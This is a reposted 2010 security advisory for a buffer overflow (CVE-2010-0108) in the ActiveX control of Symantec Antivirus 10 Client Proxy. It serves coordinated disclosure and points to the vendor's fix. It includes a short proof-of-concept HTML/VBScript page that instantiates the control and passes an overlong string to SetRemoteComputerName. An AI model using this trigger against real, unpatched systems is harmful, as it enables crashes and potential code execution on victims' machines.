Symantec Antivirus 10.0 ActiveX - buffer Overflow
|
来源:research [at] dsecrg [dot] com 作者:Polyakov 发布时间:2010-02-23
|
|
Symantec Antivirus Client Proxy, CLIproxy.dll contains ActiveX component which is vulnerable to Buffer overflow attack.
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-039
Application: Symantec Antivirus Client Proxy Versions Affected: Version 10 Vendor URL: http://symantec.com Bugs: Buffer Overflow Exploits: POC Reported: 04.05.2009 Vendor response: 07.05.2009 Date of Public Advisory: 17.02.2010 CVE-number: CVE-2010-0108 Author: Alexander Polyakov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Details *******
Attacker can construct html page which call vulnerable function "SetRemoteComputerName" from ActiveX Object cliproxy.objects.1 with long parameter
Example *******
<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'>
arg1=String(7188, "A")
target.SetRemoteComputerName arg1
</script> </html>
Fix Information ***************
Symantec product engineers have released a fix for this issue in the MR9 update. Symantec recommends all customers apply the latest available update to protect against threats of this nature. Symantec is not aware of any exploitation of or adverse customer impact from these issues.
References **********
Symantec would like to thank Alexander Polyakov from DSecRG for reporting these issues and coordinating with us while Symantec resolved them.
http://dsecrg.com/pages/vul/show.php?id=139
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2010&suid=20100217_02
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|